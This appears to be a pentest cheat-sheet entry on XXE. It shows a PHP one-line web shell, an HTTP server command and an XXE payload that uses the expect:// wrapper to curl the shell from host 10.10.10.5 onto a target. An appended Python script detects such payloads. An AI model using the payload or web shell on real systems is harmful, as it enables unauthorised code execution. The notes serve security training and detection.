PRIMARY CATEGORY → XXE
PHP Extension - Expect
As with LFI, an operator could gain RCE through an XXE vulnerability, namely through the PHP Expect extension.
Its expect:// wrapper allows system command execution.
Command syntax inside the XML declaration is quite limited, so we could upload a web shell for greater flexibility.
Creating a Web Shell
echo -n '<?php system($_GET[0]); ?>' > shell.php
Setting up an HTTP Server
python -m http.server 80
Uploading the Shell to the target through the XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY bar SYSTEM "expect://curl$IFS-O$IFS10.10.10.5/shell.php">
]>
...<SNIP>...
<email>
&bar;
</email>
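
A detection-side check for the payload shape above, as an added example that is not part of the original notes: it flags external entity declarations in an XML request body and treats expect:// and similar wrappers as block-worthy. The function names, the scheme list and the sample bodies are assumptions constructed for illustration.

```python
import re

# <!ENTITY [%] name SYSTEM "uri"   or   <!ENTITY [%] name PUBLIC "pubid" "uri"
# The closing '>' is deliberately not required, so a malformed declaration still matches.
ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(?P<param>%\s+)?(?P<name>[^\s%]+)\s+
        (?:SYSTEM|PUBLIC\s+(?:"[^"]*"|'[^']*'))\s+
        (?P<q>["'])(?P<uri>.*?)(?P=q)""",
    re.IGNORECASE | re.VERBOSE | re.DOTALL,
)

# Assumed list: schemes that have no place in an entity sent by a client.
HIGH_RISK = {"expect", "php", "file", "data", "phar", "gopher"}

def external_entities(body: str):
    """Return one finding per external entity declared in an XML request body."""
    findings = []
    for m in ENTITY_RE.finditer(body):
        uri = m.group("uri")
        scheme = uri.split(":", 1)[0].lower() if ":" in uri else ""
        findings.append({
            "name": m.group("name"),
            "parameter": bool(m.group("param")),  # %name; entities pull in remote DTDs
            "scheme": scheme,
            "severity": "high" if scheme in HIGH_RISK else "medium",
        })
    return findings

def verdict(body: str) -> str:
    """block: command/file wrapper; review: other external entity or any DOCTYPE."""
    found = external_entities(body)
    if any(f["severity"] == "high" for f in found):
        return "block"
    if found or re.search(r"<!DOCTYPE", body, re.IGNORECASE):
        return "review"
    return "allow"

# Constructed sample bodies (placeholders, not captured traffic).
SAMPLE_EXPECT = ('<?xml version="1.0"?>\n<!DOCTYPE foo [\n'
                 '<!ENTITY bar SYSTEM "expect://PLACEHOLDER"\n]>\n<email>&bar;</email>')
SAMPLE_PARAM = ('<!DOCTYPE foo [<!ENTITY % dtd SYSTEM '
                '"http://example.invalid/x.dtd"> %dtd;]><email>a</email>')
SAMPLE_INTERNAL = '<!DOCTYPE foo [<!ENTITY x "hello">]><email>&x;</email>'
SAMPLE_BENIGN = '<root><email>user@example.com</email></root>'

if __name__ == "__main__":
    for body in (SAMPLE_EXPECT, SAMPLE_PARAM, SAMPLE_INTERNAL, SAMPLE_BENIGN):
        print(verdict(body), external_entities(body))
```

A pattern match like this is a logging and triage aid; the parser itself should still refuse DOCTYPE declarations or external entity resolution.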